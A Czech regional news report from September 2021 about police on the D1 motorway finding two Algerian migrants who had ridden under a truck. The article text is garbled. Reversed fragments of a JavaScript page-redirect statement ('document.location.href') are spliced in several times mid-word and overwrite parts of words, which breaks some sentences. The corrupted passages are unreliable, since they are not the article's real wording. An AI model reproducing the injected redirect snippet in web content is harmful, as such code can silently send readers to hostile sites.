Rainbow page separator

Na odpočívadle dálnice vylezli z podvozku kamionu dva Alžířané

Středa, 1. září 2021

Vysočina / Další dva africké migranty „sbírali“ v posledních několika dnech vysočinští policisté u dálnice D1. I ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to muži z Alžírska se v pátek 27. srpna na dálniční odpočívadlo dostali na podvozku jednoho z kamionů a údajně se v něm ukryli už v Srbsku.
„Přijali jsme oznámení, že se na dálničním odpočívadle na 112. kilometru dálnice D1 ve směru na Prahu pohybují dvě podezřelé osoby. Oznamovatel uvedl, že podle vzhledu obou mužů má podezření, že by se mohlo jednat o migranty,“ informovala policejní mluvčí Dana Čírtková.
Cizinci u sebe neměli doklady [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožnosti opravňující je ke vstupu do republiky a provedení testů na COVID-19, které byly negativní, s nimi začalo řízení. „Za účasti tlumočníka policisté zahájili s oběma muži úkony správního řízení a cizinci se také podrobili identifikačním úkonům týkajícím se jejich [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožnosti. Policisté zjistili, že se jedná o státní příslušníky Alžírska ve věku 23 a 32 let,“ doplnila mluvčí s tím, že migranti skončili v zařízení pro zajištěné cizince ve Vyšních Lhotách.